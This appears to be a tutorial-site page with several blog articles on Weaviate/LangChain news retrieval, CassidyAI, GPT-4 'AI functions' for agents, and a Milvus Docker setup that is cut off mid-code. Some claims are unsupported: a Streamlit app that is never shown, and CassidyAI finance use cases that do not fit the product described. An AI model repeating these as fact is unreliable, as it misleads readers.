
How-To Tutorials - AI Tools


Harnessing Weaviate and integrating with LangChain

Alan Bernardo Palacio
31 Aug 2023
20 min read
Introduction

In the first part of this series, we built a robust RSS news retrieval system using Weaviate, enabling us to fetch and store news articles efficiently. In this second part, we take the next leap by exploring how to harness the power of Weaviate for similarity search and integrate it with LangChain. We will delve into the creation of a Streamlit application that performs real-time similarity search, contextual understanding, and dynamic context building. With the increasing demand for relevant and contextual information, this section unveils how seamlessly integrating these technologies creates an enhanced user experience.

Before we dive into similarity search and context building, make sure you are equipped with the necessary tools: familiarity with Weaviate, Streamlit, and Python will be essential as we explore these concepts and create a dynamic application.

Similarity Search and Weaviate Integration

The journey of enhancing news context retrieval doesn't end with fetching articles. Users often seek not just relevant information, but also contextually similar content. This is where similarity search comes into play.

Similarity search enables us to find articles that share semantic similarities with a given query. In the context of news retrieval, it's like finding articles that discuss similar events or topics. This functionality empowers users to discover a broader range of perspectives and relevant articles.

Weaviate's core strength lies in its ability to perform fast and accurate similarity search. We use the perform_similarity_search function to query Weaviate for articles related to a given concept. This function returns a list of articles, each scored by its relevance to the query.

```python
import weaviate
from langchain.llms import OpenAI
import datetime
import pytz
from dateutil.parser import parse

davinci = OpenAI(model_name='text-davinci-003')

def perform_similarity_search(concept):
    """
    Perform a similarity search on the given concept.

    Args:
    - concept (str): The term to search for, e.g., "Bitcoin" or "Ethereum"

    Returns:
    - dict: A dictionary containing the result of the similarity search
    """
    client = weaviate.Client("http://weaviate:8080")
    nearText = {"concepts": [concept]}
    response = (
        client.query
        .get("RSS_Entry", ["title", "link", "summary", "publishedDate", "body"])
        .with_near_text(nearText)
        .with_limit(50)  # fetching a maximum of 50 similar entries
        .with_additional(['certainty'])
        .do()
    )
    return response

def sort_and_filter(results):
    # Sort results by certainty
    sorted_results = sorted(results, key=lambda x: x['_additional']['certainty'], reverse=True)
    # Sort the top results by date
    top_sorted_results = sorted(sorted_results[:50], key=lambda x: parse(x['publishedDate']), reverse=True)
    # Return the top 5 results
    return top_sorted_results[:5]

# Define the prompt template
template = """
You are a financial analyst reporting on the latest developments and providing an overview of the topics you are asked about. Using only the provided context, answer the following question. Prioritize relevance and clarity in your response. If relevant information regarding the query is not found in the context, clearly indicate this in the response, asking the user to rephrase to make the search topics more clear.
If information is found, summarize the key developments and cite the sources inline using numbers (e.g., [1]). All sources should consistently be cited with their "Source Name", "link to the article", and "Date and Time". List the full sources at the end in the same numerical order.

Today is: {today_date}

Context: {context}

Question: {query}

Answer:

Example Answer (for no relevant information):
"No relevant information regarding 'topic X' was found in the provided context."

Example Answer (for relevant information):
"The latest update on 'topic X' reveals that A and B have occurred. This was reported by 'Source Name' on 'Date and Time' [1]. Another significant development is D, as highlighted by 'Another Source Name' on 'Date and Time' [2]."

Sources (if relevant):
[1] Source Name, "link to the article provided in the context", Date and Time
[2] Another Source Name, "link to the article provided in the context", Date and Time
"""

# query_db runs the similarity search and feeds the results to the LLM
def query_db(query):
    # Query the Weaviate database
    results = perform_similarity_search(query)
    results = results['data']['Get']['RSS_Entry']
    top_results = sort_and_filter(results)
    # Convert the context data into a readable string
    context_string = [f"title:{r['title']}\nsummary:{r['summary']}\nbody:{r['body']}\nlink:{r['link']}\npublishedDate:{r['publishedDate']}\n\n" for r in top_results]
    context_string = '\n'.join(context_string)
    # Get today's date
    date_format = "%a, %d %b %Y %H:%M:%S %Z"
    today_date = datetime.datetime.now(pytz.utc).strftime(date_format)
    # Format the prompt
    prompt = template.format(
        query=query,
        context=context_string,
        today_date=today_date
    )
    # Print the formatted prompt for verification
    print(prompt)
    # Run the prompt through the model directly
    response = davinci(prompt)
    # Return the response
    return response
```

Retrieved results need effective organization for user consumption. The sort_and_filter function handles this task: it first sorts the results by their certainty scores, ensuring the most relevant articles are prioritized, and then sorts the top results by published date, so that the latest information builds the context for the LLM.

LangChain Integration for Context Building

While similarity search enhances content discovery, context is the key to understanding the significance of articles. Integrating LangChain with Weaviate allows us to dynamically build context and provide more informative responses.

LangChain acts as our context builder. It enhances the user experience by constructing context around the retrieved articles, enabling users to understand the broader narrative. The query_db function incorporates LangChain's capabilities: it generates a context-rich prompt that combines the user's query with the top retrieved articles, structured using a template that ensures clarity and relevance.

The prompt template is a structured piece of text that guides the model to generate contextually meaningful responses. It dynamically includes information about the query, the context, and the relevant articles, ensuring that users receive comprehensive and informative answers.
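To see the pieces working together end to end, here is a minimal usage sketch. It assumes the Weaviate instance is reachable at http://weaviate:8080 and that the RSS_Entry collection from part one is already populated; the query string is just an illustrative example.

```python
# Minimal usage sketch: ask the retrieval pipeline a question end to end.
# Assumes the RSS_Entry collection from part one is populated.
if __name__ == "__main__":
    answer = query_db("What are the latest developments around Bitcoin ETFs?")
    print(answer)
```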
Handling Irrelevant Queries

One of LangChain's unique strengths is its ability to gracefully handle queries with limited context. When no relevant information is found in the context, the model generates a response that informs the user about the absence of relevant data. This ensures transparency and guides users to refine their queries for better results.

In the next section, we integrate this enhanced news retrieval system with a Streamlit application, providing users with an intuitive interface to access relevant and contextual information effortlessly.

Building the Streamlit Application

So far, we have explored the intricate layers of building a robust news context retrieval system using Weaviate and LangChain. Now we dive into user experience enhancement by creating a Streamlit application. Streamlit empowers us to transform our backend functionality into a user-friendly front end with minimal effort, giving users a seamless and intuitive way to access relevant news articles and context.

Streamlit is a Python library that enables developers to create interactive web applications with minimal code. Its simplicity, coupled with its ability to provide real-time visualizations, makes it a fantastic choice for data-driven applications. Streamlit apps are simple Python scripts that leverage the Streamlit API functions.

Alongside the front end, the system relies on an ingestion service that keeps the Weaviate database up to date. The script below waits for Weaviate to become available, fetches articles from a list of RSS feeds, breaks them down into paragraphs, and continuously inserts them into the database:

```python
import feedparser
import pandas as pd
import time
from bs4 import BeautifulSoup
import requests
import random
from datetime import datetime, timedelta
import pytz
import uuid
import weaviate
import json

def wait_for_weaviate():
    """Wait until Weaviate is available."""
    while True:
        try:
            # Try fetching the Weaviate metadata without initiating the client here
            response = requests.get("http://weaviate:8080/v1/meta")
            response.raise_for_status()
            meta = response.json()
            # If successful, the instance is up and running
            if meta:
                print("Weaviate is up and running!")
                return
        except requests.exceptions.RequestException:
            # If there's any error (connection, timeout, etc.), wait and try again
            print("Waiting for Weaviate...")
            time.sleep(5)

RSS_URLS = [
    "https://thedefiant.io/api/feed",
    "https://cointelegraph.com/rss",
    "https://cryptopotato.com/feed/",
    "https://cryptoslate.com/feed/",
    "https://cryptonews.com/news/feed/",
    "https://smartliquidity.info/feed/",
    "https://bitcoinmagazine.com/feed",
    "https://decrypt.co/feed",
    "https://bitcoinist.com/feed/",
    "https://cryptobriefing.com/feed",
    "https://www.newsbtc.com/feed/",
    "https://coinjournal.net/feed/",
    "https://ambcrypto.com/feed/",
    "https://www.the-blockchain.com/feed/"
]

def get_article_body(link):
    try:
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.3'}
        response = requests.get(link, headers=headers, timeout=10)
        response.raise_for_status()
        soup = BeautifulSoup(response.content, 'html.parser')
        paragraphs = soup.find_all('p')
        # Directly return list of non-empty paragraphs
        return [p.get_text().strip() for p in paragraphs if p.get_text().strip() != ""]
    except Exception as e:
        print(f"Error fetching article body for {link}. Reason: {e}")
        return []

def parse_date(date_str):
    # Current date format from the RSS
    date_format = "%a, %d %b %Y %H:%M:%S %z"
    try:
        dt = datetime.strptime(date_str, date_format)
        # Ensure the datetime is in UTC
        return dt.astimezone(pytz.utc)
    except ValueError:
        # Attempt to handle other possible formats
        date_format = "%a, %d %b %Y %H:%M:%S %Z"
        dt = datetime.strptime(date_str, date_format)
        return dt.replace(tzinfo=pytz.utc)

def fetch_rss(from_datetime=None):
    all_data = []
    all_entries = []
    # Step 1: Fetch all the entries from the RSS feeds and filter them by date.
    for url in RSS_URLS:
        print(f"Fetching {url}")
        feed = feedparser.parse(url)
        entries = feed.entries
        print('feed.entries', len(entries))
        for entry in feed.entries:
            entry_date = parse_date(entry.published)
            # Filter the entries based on the provided date
            if from_datetime and entry_date <= from_datetime:
                continue
            # Storing only necessary data to minimize memory usage
            all_entries.append({
                "Title": entry.title,
                "Link": entry.link,
                "Summary": entry.summary,
                "PublishedDate": entry.published
            })
    # Step 2: Shuffle the filtered entries.
    random.shuffle(all_entries)
    # Step 3: Extract the body for each entry and break it down by paragraphs.
    for entry in all_entries:
        article_body = get_article_body(entry["Link"])
        print("\nTitle:", entry["Title"])
        print("Link:", entry["Link"])
        print("Summary:", entry["Summary"])
        print("Published Date:", entry["PublishedDate"])
        # Create separate records for each paragraph
        for paragraph in article_body:
            data = {
                "UUID": str(uuid.uuid4()),  # UUID for each paragraph
                "Title": entry["Title"],
                "Link": entry["Link"],
                "Summary": entry["Summary"],
                "PublishedDate": entry["PublishedDate"],
                "Body": paragraph
            }
            all_data.append(data)
    print("-" * 50)
    df = pd.DataFrame(all_data)
    return df

def insert_data(df, batch_size=100):
    # Initialize the batch process
    with client.batch as batch:
        batch.batch_size = batch_size
        # Loop through and batch import the 'RSS_Entry' data
        for i, row in df.iterrows():
            if i % 100 == 0:
                print(f"Importing entry: {i+1}")  # Status update
            properties = {
                "UUID": row["UUID"],
                "Title": row["Title"],
                "Link": row["Link"],
                "Summary": row["Summary"],
                "PublishedDate": row["PublishedDate"],
                "Body": row["Body"]
            }
            client.batch.add_data_object(properties, "RSS_Entry")

if __name__ == "__main__":
    # Wait until Weaviate is available
    wait_for_weaviate()
    # Initialize the Weaviate client
    client = weaviate.Client("http://weaviate:8080")
    client.timeout_config = (3, 200)
    # Reset the schema
    client.schema.delete_all()
    # Define the "RSS_Entry" class
    class_obj = {
        "class": "RSS_Entry",
        "description": "An entry from an RSS feed",
        "properties": [
            {"dataType": ["text"], "description": "UUID of the entry", "name": "UUID"},
            {"dataType": ["text"], "description": "Title of the entry", "name": "Title"},
            {"dataType": ["text"], "description": "Link of the entry", "name": "Link"},
            {"dataType": ["text"], "description": "Summary of the entry", "name": "Summary"},
            {"dataType": ["text"], "description": "Published Date of the entry", "name": "PublishedDate"},
            {"dataType": ["text"], "description": "Body of the entry", "name": "Body"}
        ],
        "vectorizer": "text2vec-transformers"
    }
    # Add the schema
    client.schema.create_class(class_obj)
    # Retrieve and display the schema
    schema = client.schema.get()
    print(json.dumps(schema, indent=4))
    print("-" * 50)
    # Current datetime
    now = datetime.now(pytz.utc)
    # Fetch articles from the last few days
    days_ago = 3
    print(f"Getting historical data for the last {days_ago} days.")
    last_week = now - timedelta(days=days_ago)
    df_hist = fetch_rss(last_week)
    print("Head")
    print(df_hist.head().to_string())
    print("Tail")
    print(df_hist.tail().to_string())
    print("-" * 50)
    print("Total records fetched:", len(df_hist))
    print("-" * 50)
    print("Inserting data")
    # Insert historical data
    insert_data(df_hist, batch_size=100)
    print("-" * 50)
    print("Data Inserted")
    # Check if there is any relevant news in the last minute
    while True:
        # Current datetime
        now = datetime.now(pytz.utc)
        # Fetch articles from the last minute
        one_min_ago = now - timedelta(minutes=1)
        df = fetch_rss(one_min_ago)
        print("Head")
        print(df.head().to_string())
        print("Tail")
        print(df.tail().to_string())
        print("Inserting data")
        # Insert minute data
        insert_data(df, batch_size=100)
        print("data inserted")
        print("-" * 50)
        # Sleep for a minute
        time.sleep(60)
```

Streamlit apps rely on specific Python libraries to operate smoothly. Our app builds on streamlit itself, plus the weaviate and langchain clients introduced earlier, to enable real-time context retrieval.
Demonstrating Real-time Context Retrieval

As we bring the various elements of our news retrieval system together, it's time to experience the magic firsthand by using the Streamlit app to perform real-time context retrieval. The app's interface lets users input queries and initiate similarity searches, making the underlying Weaviate- and LangChain-powered functionality effortless to use. The Streamlit app acts as a bridge, making complex interactions accessible through a clean and intuitive interface. The true power of the application shows when it provides context for user queries: LangChain dynamically builds context around retrieved articles and responses, creating a comprehensive narrative that enhances user understanding.

Conclusion

In this second part of our series, we've created an interactive and intuitive user interface using Streamlit. By weaving together the capabilities of Weaviate, LangChain, and Streamlit, we've established a powerful framework for context-based news retrieval. The Streamlit app shows how the integration of these technologies can simplify complex processes, allowing users to effortlessly retrieve news articles and their contextual significance. As we wrap up, the next step is to dive into the provided code and experience the synergy of these technologies firsthand. Empower your applications with the ability to deliver context-rich, relevant information, bringing a new level of user experience to modern data-driven platforms.

Through these two articles, we've built an intelligent news retrieval system that leverages cutting-edge technologies. We've explored the foundations of Weaviate, delved into similarity search, harnessed LangChain for context building, and created a Streamlit application that provides users with a seamless experience. In the modern landscape of information retrieval, context is key, and integrating these technologies lets us provide users with not just data, but understanding. As you venture forward, remember that these concepts are stepping stones: embrace the code, experiment, and extend these ideas to create applications that offer tailored and relevant experiences to your users.

Author Bio

Alan Bernardo Palacio is a data scientist and an engineer with vast experience in different engineering fields. His focus has been the development and application of state-of-the-art data products and algorithms in several industries. He has worked for companies such as Ernst and Young and Globant, and now holds a data engineer position at Ebiquity Media, helping the company create a scalable data pipeline. Alan graduated with a Mechanical Engineering degree from the National University of Tucuman in 2015, participated as the founder of startups, and later earned a Master's degree from the faculty of Mathematics at the Autonomous University of Barcelona in 2017. Originally from Argentina, he now works and resides in the Netherlands.

LinkedIn


Revolutionizing Business Productivity using CassidyAI

Julian Melanson
28 Jun 2023
6 min read
In recent times, the entrepreneurial environment has seen a surge in innovation, particularly in artificial intelligence. Among the stalwarts of this revolution is Neo, a startup accelerator masterminded by Silicon Valley investor Ali Partovi. In a groundbreaking move in March, Neo entered a strategic partnership with renowned AI research organization OpenAI and tech giant Microsoft Corp. The objective was clear: to offer no-cost software and expert advice to startups focusing on AI. The partnership's results are already tangible, with CassidyAI, a startup championed by content creator Justin Fineberg, among the companies benefiting from this initiative.

CassidyAI: A Pioneer in AI-Driven Business Automation

Fineberg recently announced that CassidyAI is stepping out from the shadows, shedding its stealth mode. CassidyAI's primary function is an embodiment of innovation: enabling businesses to create customized AI assistants, thereby automating tasks, optimizing productivity, and integrating AI across entire organizations. With this aim, CassidyAI is at the forefront of a paradigm shift in business process automation and management.

Amplifying Productivity: CassidyAI's Vision

At its core, CassidyAI embraces an ambitious vision: to multiply the productivity of every team within an organization by a factor of ten. This tenfold increase isn't just a lofty goal; it is a transformative approach that deploys AI technology across business operations. CassidyAI accomplishes this by providing a platform for generating bespoke AI assistants that cater to individual departmental needs, training these virtual assistants on each department's specific knowledge base and data sets.

Harnessing AI Across Departments: Versatile Use Cases

The potential applications of CassidyAI's platform are practically limitless, and the diversity of use cases underscores the flexibility and versatility of the AI-assistant creation process. In marketing, for instance, teams can train CassidyAI on their unique writing style and marketing objectives, crafting content that aligns perfectly with the brand image. Similarly, sales teams can enhance their outreach initiatives by leveraging CassidyAI's understanding of the sales pitch, process, and customer profiles.

In customer service, AI assistants can respond to inquiries accurately and efficiently thanks to CassidyAI's access to comprehensive support knowledge. Engineering teams can train CassidyAI on their technical stack, engineering methods, and architecture, enabling more informed technical decisions and codebase clarity. Product teams can use CassidyAI's understanding of their team dynamics and user experience principles to drive product ideation and roadmap collaboration. Finally, HR departments can give employees quick access to HR documentation through AI assistants trained to handle such inquiries.

Data Security and Transparency: CassidyAI's Assurance

Beyond its vast application range, CassidyAI distinguishes itself through its commitment to data security and transparency. The platform's ability to import knowledge from various platforms ensures a deep understanding of a company's brand, operations, and unique selling propositions. Equally important, all interactions with CassidyAI remain reliable and secure thanks to stringent data-handling practices and clear citation of sources.

Setting Up AI Automation: A No-Code Approach

CassidyAI's approach to implementing AI in businesses is straightforward and code-free, catering to those without programming skills. Businesses begin by securely uploading their internal data and knowledge to train CassidyAI on their unique products, strategies, processes, and more. They then construct AI assistants fine-tuned for their distinct use cases, without writing a single line of code. Once the AI assistants are ready, they can be shared across the team, fostering AI adoption and collaboration throughout the organization.

Interestingly, the onboarding process for each company joining CassidyAI is currently personally overseen by Fineberg. Although this may limit the pace of early access, it provides a personalized and detailed introduction to CassidyAI's capabilities and potential. Companies interested in exploring CassidyAI's offerings can request a demo through their website.

CassidyAI represents a revolutionary approach to adopting AI technology in businesses. By creating tailored AI assistants that cater to the specific needs of different departments, it offers an opportunity to substantially improve productivity and streamline operations. Its emergence from stealth mode signals a new era of AI-led business automation and provides an exciting glimpse into the future of work. As CassidyAI gains traction, more businesses are likely to leverage this innovative tool, fundamentally transforming their approach to task automation and productivity enhancement.

You can browse the website and request a demo here: https://www.cassidyai.com

Real-World Use Cases

Here are some specific examples of how CassidyAI is being used by real businesses:

- Centrifuge: Centrifuge is using CassidyAI to originate and securitize real-world assets, helping it provide businesses with access to financing while reducing risk.
- Tinlake: Tinlake is using CassidyAI to automate the issuing and managing of loans backed by real-world assets, providing a more efficient and cost-effective lending solution for businesses.
- Invoice Finance: Invoice Finance is using CassidyAI to automate invoice processing and to provide financing to businesses based on the value of their invoices, enabling a more efficient and timely financing solution.
- Bondora: Bondora is using CassidyAI to assess loan risk and give investors more information about the loans they are considering, providing a more transparent and efficient investment platform.
- Upstart: Upstart is using CassidyAI to assess borrowers' creditworthiness and provide more personalized lending terms, enabling a more inclusive and affordable lending solution.

These are just a few examples of how CassidyAI is being used by real businesses to improve their operations and provide better services to their customers. As CassidyAI continues to develop, even more use cases are likely to emerge.

Summary

CassidyAI, a startup in partnership with Neo, OpenAI, and Microsoft, is revolutionizing business productivity through AI-driven automation. Their platform enables businesses to create customized AI assistants, optimizing productivity and integrating AI across departments. With a no-code approach, CassidyAI caters to use cases in marketing, sales, customer service, engineering, product, and HR. The platform emphasizes data security and transparency while providing a personalized onboarding process. As CassidyAI emerges from stealth mode, it heralds a new era of AI-led business automation, offering businesses the opportunity to enhance productivity and streamline operations.

Author Bio

Julian Melanson is one of the founders of Leap Year Learning, a cutting-edge online school that specializes in teaching creative disciplines and integrating AI tools. We believe that creativity and AI are the keys to a successful future, and our courses help equip students with the skills they need to succeed in a continuously evolving world. Our seasoned instructors bring real-world experience to the virtual classroom, and our interactive lessons help students reinforce their learning with hands-on activities.

No matter your background, from beginners to experts, hobbyists to professionals, Leap Year Learning is here to bring in the future of creativity, productivity, and learning!


Using AI Functions to Solve Complex Problems

Shaun McDonogh
09 Jun 2023
8 min read
GPT-4 feels like Einstein's theory of general relativity: just as physicists today are still extracting useful insights from relativity, programmers will spend a long time uncovering everything GPT-4 makes possible.

Here is one example. Big problems can be solved by breaking them down into small tasks. Our jobs usually boil down to performing one problem-solving or productive activity after the next. So, what if you could discern clearly what those smaller tasks were and give them to your side-kick brain to figure out and run for you 'auto-magically'?

Note that the above says, what if you could discern. Already we bump up against a lesson in using LLMs. Why do you need to discern it? Can't GPT-4 be given the job of discerning the tasks required? If so, could it then orchestrate other GPT-4 "agents" to break down the task further? This is exactly where we can make use of a tool like Auto-GPT.

Let's look at an example that I am developing right now for an Auto-GPT using Rust.

Say you build websites for a living. Websites need a web server. Web servers take a request (usually through an API), run some code in line with that request, and send back a response. Let's break down the goal of building a web server into the actors or agents that might be required when building an Auto-GPT:

- Solution Architect: Work with the customer (you) to develop the scope and aim of the application. Confirm the recommended technology stack to work within.
- Project (Agent) Manager: Compile and track a preliminary list of tasks needed to complete the project.
- Data Manager: Identify required external and internal API endpoints.
- Code Admin: Write a code spec sheet for the developer.
- Junior Developer: Take a first stab at the code; run unit testing.
- Senior Developer: Sense-check the initial code and adjust; run unit testing.
- Quality Control: Test and send back code for adjustments.
- Customer (you): Supply feedback and request adjustments.

You may have guessed that we will not be hiring 7 members of staff to build web servers. However, planning out this structure is necessary to help us organise building a bot that can itself build, test, and deploy any backend server you ask it to.

Our agents will need tools to work with. They need to be given a set of instructions and functions that will get the subtask done without the usual response of "I am just an AI language model".
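To make the division of labour concrete, here is a minimal sketch (in Python, with role names and instructions invented for illustration) of how such an agent roster might be represented as data: each agent is just a role plus the standing instructions it receives.

```python
from dataclasses import dataclass

@dataclass
class Agent:
    role: str          # who this agent pretends to be
    instructions: str  # standing prompt prepended to every task it receives

# A hypothetical roster mirroring the breakdown above
AGENTS = [
    Agent("Solution Architect", "Scope the application and confirm the tech stack."),
    Agent("Project Manager", "Compile and track the task list for the project."),
    Agent("Junior Developer", "Write a first version of the code for the spec."),
    Agent("Senior Developer", "Review and correct the junior developer's code."),
    Agent("Quality Control", "Run the tests and report failures."),
]

def build_prompt(agent: Agent, task: str) -> str:
    # Each LLM call frames the task in the agent's role
    return f"You are a {agent.role}. {agent.instructions}\n\nTask: {task}"
```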
When developing such a tool, it became clear to me that a new paradigm has hit developers: "AI Functions". What we are about to discuss brings up potential gaps in the guard-rails of GPT-4, which is unlikely to be news to the OpenAI team but may be of some surprise to you.

What are AI Functions?

The fact that AI hallucinates would annoy most people. But not programmers, nor the folk who developed Marvin. Right now, when you ask ChatGPT for a response, it sends a whole bunch of jargon with it.

What if I told you there was a hack: a way to automatically get distilled, relevant information out of ChatGPT through the OpenAI API, in a structured response that can drive actions in your code. Here is an example. Suppose you give an AI the following "function", which is just text disguised as a programming function:

```rust
struct Sentiment {
    happy_rating: 0,
    sad_rating: 0
}

fn convert_comments_into_sentiment(comments: String) -> Sentiment {
    // Function takes in comments from YouTube video
    // Considers all aspects of what is said in comments
    // Returns Sentiment struct with happy and sad rating
    // Does not return anything else. No commentary.
    return sentiment;
}
```

You then ask the AI to print only what the function would return, and pass it the YouTube comments as input. The AI (GPT-4) will then hallucinate a response, even though there is no actual code inside the function. None. There is no code to perform this task.

No jargon like "I am an AI, I cannot blah blah blah" is returned. Instead, you extract the AI's pure sentiment analysis in a format you can build into your application.

The hack here is that we have built a pretend function, without any code in it. We described exactly what this function (written in Rust syntax in this example) does, and the structure of its output, using comments and a struct. GPT-4 then interprets what it thinks the function does and assesses the input provided (YouTube comments in this example) against it. The output is then structured in the LLM's response. Therefore, we can have LLMs supply responses structured in such a way that they can be used by other agents (also the GPT-4 LLM).

The entire process would look something like this [diagram in the original post]. This is an oversimplified view of what is happening. Note that agents are not always needed: sometimes the function can just be called as regular code, no LLM needed.
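To ground the idea, here is a minimal sketch of how an "AI function" call might be wired up in Python against the OpenAI chat completions API. The pseudo-function text and the JSON parsing are assumptions for illustration, not the author's actual Rust implementation:

```python
import json
import openai

openai.api_key = "sk-..."  # your API key

# The "AI function": plain text disguised as code, mirroring the Rust example.
# Asking for JSON output makes the response trivially machine-readable.
AI_FUNCTION = """
fn convert_comments_into_sentiment(comments: String) -> Sentiment {
    // Function takes in comments from a YouTube video
    // Considers all aspects of what is said in the comments
    // Returns a JSON object: {"happy_rating": int, "sad_rating": int}
    // Does not return anything else. No commentary.
}
"""

def call_ai_function(comments: str) -> dict:
    # Ask the model to print ONLY what the function would return
    prompt = (
        f"{AI_FUNCTION}\n"
        "Print only what this function would return for the input below. "
        f"Input comments:\n{comments}"
    )
    response = openai.ChatCompletion.create(
        model="gpt-4",
        messages=[{"role": "user", "content": prompt}],
        temperature=0,  # keep the structured output deterministic
    )
    # The reply should be bare JSON we can hand to other agents or plain code
    return json.loads(response.choices[0].message.content)

# Example: call_ai_function("Loved it! / Worst video ever. / Pretty good overall.")
```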
The Bigger Picture

Why stop there? Auto-GPTs will likely become like plugins. With Auto-GPTs popping up everywhere, most software-related tasks can be taken care of. Rather than calling an API, your Auto-GPT could call another Auto-GPT. Rather than writing AI Functions, a primary agent would know which Auto-GPTs should be assigned to various tasks. It could then write its own program that connects to them.

This sort of recursion or self-improvement is where predicted growth in AI is already shown to proceed either exponentially or in sigmoid-like jumps. My own version of this self-programming task is already done. It was surprisingly trivial to do with GPT-4's help. It works well, but it doesn't replace human developers yet.

Not All Sunshine and Roses

GPT-4 is not without some annoying limitations. These include:

- Quality of performance at the given task.
- Changes in response quality depending on a slight change in input.
- Text formatting that occasionally includes something the model should not.
- Size and dollar cost of output.
- Time, latency, and crashing of API output.

These limitations could technically be worked around by breaking tasks down into even smaller chunks, but this is where I draw the line: what is the point of trying to automate anything if you end up having to code everything? However, it has become clear through this exercise that just a few improvements on the above limitations will lead to a significant amount of task automation with Auto-GPTs.

Quick Wins with Self-testing

One algorithm that has worked very well with the current technology is having GPT-4 write code, then having our program execute and test that code and feed back to GPT-4 what is not working. The AI Function then prompts GPT-4 as a "Senior Developer Agent" to rewrite the code and return it to the "Quality Agent" for more unit testing.

What you end up with is a program that can write code, test it, and confirm all is working. This works now and is useful. The downside is still the cost of making too many calls to the OpenAI API and some quality limitations with GPT-4. Therefore, until GPT-5, I remain working directly in my development environment or in the ChatGPT interface, extracting quick code snippets.
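The write-test-rewrite loop described above can be sketched in a few lines. This is a minimal illustration under assumptions of my own (the helper names are hypothetical, and exec-ing generated code is shown purely for demonstration; it is unsafe outside a sandbox):

```python
import openai

openai.api_key = "sk-..."  # your API key

def generate_code(task: str, feedback: str = "") -> str:
    # Hypothetical helper: asks the LLM for code, optionally passing
    # the previous attempt's error message back as feedback
    prompt = f"Write Python code for: {task}\nReturn only code, no commentary."
    if feedback:
        prompt += f"\nThe previous attempt failed with:\n{feedback}\nFix it."
    response = openai.ChatCompletion.create(
        model="gpt-4",
        messages=[{"role": "user", "content": prompt}],
    )
    return response.choices[0].message.content

def self_testing_loop(task: str, max_rounds: int = 3) -> str:
    feedback = ""
    for _ in range(max_rounds):
        code = generate_code(task, feedback)
        try:
            exec(code, {})  # UNSAFE outside a sandboxed environment
            return code     # code ran without raising: accept it
        except Exception as e:
            feedback = repr(e)  # feed the failure back to the model
    raise RuntimeError("Model could not produce working code")
```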
Next Steps

It sounds clichéd, but I'm learning something new every day working with LLMs. A recurring realisation is that we should not only be trying to solve newer problems in less time, but also learning what the right questions to ask our current LLMs even are. They are capable of more than I believe we realise. When open-source LLMs reach a GPT-5-like level, I suspect Auto-GPTs will be everywhere.

Author Bio

Shaun McDonogh is the lead developer and researcher at Crypto Wizards. He has 6 years' experience in developing high-performance trading software solutions with ML and 15 years' experience working with frontend and backend web technologies.

In his prior career, Shaun worked as a Finance Director, Data Scientist, and Analytics Lead in various multi-million-dollar entities before making the transition to developing pioneering solutions for developers in emerging tech industries. His favorite programming languages to teach include Rust, TypeScript, and Python.

Shaun's mission is to support developers in navigating the ever-changing landscape of emerging technologies in computer software engineering through a new coding arm, Code Raiders.


Hands-On Vector Similarity Search with Milvus

Alan Bernardo Palacio
21 Aug 2023
14 min read
Introduction

In the realm of AI and machine learning, effective management of vast, high-dimensional vector data is critical. Milvus, an open-source vector database, tackles this challenge using advanced indexing for swift similarity search and analytics, catering to AI-driven applications.

Milvus operates on vectorization and quantization, converting complex raw data into streamlined high-dimensional vectors for efficient indexing and querying. Its scope spans recommendation, image recognition, natural language processing, and bioinformatics, boosting result precision and overall efficiency.

Milvus impresses not just with its capabilities but also with its design flexibility, supporting diverse storage backends such as MinIO, Ceph, AWS S3, and Google Cloud Storage, alongside etcd for metadata storage.

Local deployment becomes user-friendly with Docker Compose, which manages multi-container Docker applications and is well suited to Milvus' distributed architecture. This guide walks through deploying Milvus locally via Docker Compose and then putting it to work on sentence embeddings. Let's get started.

Standalone Milvus with Docker Compose

Setting up a local instance of Milvus involves a multi-service architecture consisting of the Milvus server, metadata storage, and an object storage server. Docker Compose provides an ideal way to manage such a configuration conveniently and efficiently.

The Docker Compose file for deploying Milvus locally consists of three services: etcd, minio, and milvus itself. etcd provides metadata storage, minio functions as the object storage server, and milvus handles vector data processing and search. By specifying service dependencies and environment variables, we establish seamless communication between these components. The milvus, etcd, and minio services run in isolated containers, ensuring operational isolation and enhanced security.

To launch the Milvus application, all you need to do is execute the Docker Compose file. Docker Compose manages the initialization sequence based on service dependencies and launches the entire stack with a single command. The following docker-compose.yml specifies all of the aforementioned components:

```yaml
version: '3'
services:
  etcd:
    container_name: milvus-etcd
    image: quay.io/coreos/etcd:v3.5.5
    environment:
      - ETCD_AUTO_COMPACTION_MODE=revision
      - ETCD_AUTO_COMPACTION_RETENTION=1000
      - ETCD_QUOTA_BACKEND_BYTES=4294967296
      - ETCD_SNAPSHOT_COUNT=50000
    command: etcd -advertise-client-urls=http://127.0.0.1:2379 -listen-client-urls http://0.0.0.0:2379 --data-dir /etcd
  minio:
    container_name: milvus-minio
    image: minio/minio:RELEASE.2022-03-17T06-34-49Z
    environment:
      MINIO_ACCESS_KEY: minioadmin
      MINIO_SECRET_KEY: minioadmin
    ports:
      - "9001:9001"
      - "9000:9000"
    command: minio server /minio_data --console-address ":9001"
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3
  milvus:
    container_name: milvus-standalone
    image: milvusdb/milvus:v2.3.0-beta
    command: ["milvus", "run", "standalone"]
    environment:
      ETCD_ENDPOINTS: etcd:2379
      MINIO_ADDRESS: minio:9000
    ports:
      - "19530:19530"
      - "9091:9091"
    depends_on:
      - "etcd"
      - "minio"
```

After defining the docker-compose file, we can deploy the services by first running docker compose build and then running docker compose up -d.
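Before moving on, it can be worth confirming that the stack actually came up. A quick sketch of such a check, assuming pymilvus is installed and the standalone instance is listening on its default port:

```python
from pymilvus import connections, utility

# Connect to the standalone Milvus instance started by Docker Compose
connections.connect("default", host="localhost", port="19530")

# An empty list is expected on a fresh deployment; an exception here
# usually means the containers are still starting up
print("Collections:", utility.list_collections())
```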
In the next section, we move on to a practical example: creating sentence embeddings. This process leverages Transformer models to convert sentences into high-dimensional vectors. These embeddings capture the semantic essence of the sentences and serve as an excellent demonstration of the sort of data that can be stored and processed with Milvus.

Creating Sentence Embeddings

Creating sentence embeddings involves a few steps: preparing your environment, importing the necessary libraries, and finally generating and processing the embeddings. We'll walk through each step, assuming the code is executed in a Python environment where the Milvus database is running.

First, the requirements.txt file:

```
transformers==4.25.1
pymilvus==2.1.0
torch==2.0.1
protobuf==3.18.0
```

Now let's import the packages:

```python
import numpy as np
import torch
import torch.nn.functional as F
from transformers import AutoTokenizer, AutoModel
from pymilvus import (
